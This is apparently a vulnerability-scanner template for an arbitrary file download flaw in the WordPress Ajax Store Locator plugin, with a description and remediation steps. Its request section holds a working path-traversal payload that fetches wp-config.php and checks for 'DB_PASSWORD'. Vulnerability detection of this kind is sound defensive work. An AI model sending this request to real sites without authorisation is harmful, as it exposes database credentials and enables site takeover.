id: CNNVD-201412-193
info:
  name: Wordpress Ajax_Store_Locator plug-in sl_file_download.php arbitrary file download vulnerability detection
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Ajax Store Locator ‘sl_file_download.php’ arbitrary file download vulnerability
    WordPress is a blog platform developed by the WordPress Software Foundation using the PHP language. The platform supports the establishment of personal blog websites on PHP and MySQL servers. Ajax Store Locator is one of the map production and positioning management plug-ins.

    There is an arbitrary file download vulnerability in the WordPress Ajax Store Locator plug-in 1.2 and earlier versions. The vulnerability is caused by the program not fully filtering the input submitted by the user. An attacker can exploit this vulnerability to download arbitrary files in the context of the affected web server process and obtain sensitive information.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://ajaxlaundry.com/store-locator/

    Temporary fix:
    1. Filter \".\" so that users cannot go back to the upper directory in the URL.
    2. Regular matching strictly determines the format of user input parameters, hard-codes or uniformly encodes the file name parameters passed by the user, performs whitelist control on file types, and rejects parameters containing malicious characters or null characters.
    3. Prohibit the system from providing directory traversal services, such as: php.ini configures open_basedir to limit file access scope.
    4. Save the file path to the database and let the user submit the file corresponding to the ID to download the file.
    5. Verify permissions before users download files.
requests:
- matchers:
  - type: status
    status:
    - 200
  - type: word
    words:
    - DB_PASSWORD
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php'
  method: GET
